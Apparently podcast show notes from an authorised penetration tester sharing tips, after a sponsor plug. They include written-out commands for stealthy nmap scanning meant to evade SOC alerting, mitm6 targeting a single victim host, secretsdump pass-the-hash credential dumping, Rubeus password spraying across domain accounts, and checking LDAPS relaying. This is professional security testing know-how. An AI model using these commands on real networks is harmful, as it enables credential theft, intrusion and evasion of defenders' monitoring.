7MS #514: Tales of Pentest Pwnage - Part 34
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!
Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include:
I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like:
nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile
Using mitm6 in "sniper" mode by targeting just one host with:
mitm6 -hw victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqdn
Using secretsdump to target a single host:
secretsdump.py -target-ip 22.214.171.124 localadmin:@126.96.36.199 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after
localadmin- it's intentional, NOT an error!
Rubeus makes password spraying easy-peasy!
Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!
LDAPs relaying not working? Make sure it's config'd right:
nmap -p636 -sV -iL txt-file-with-dcs-in-it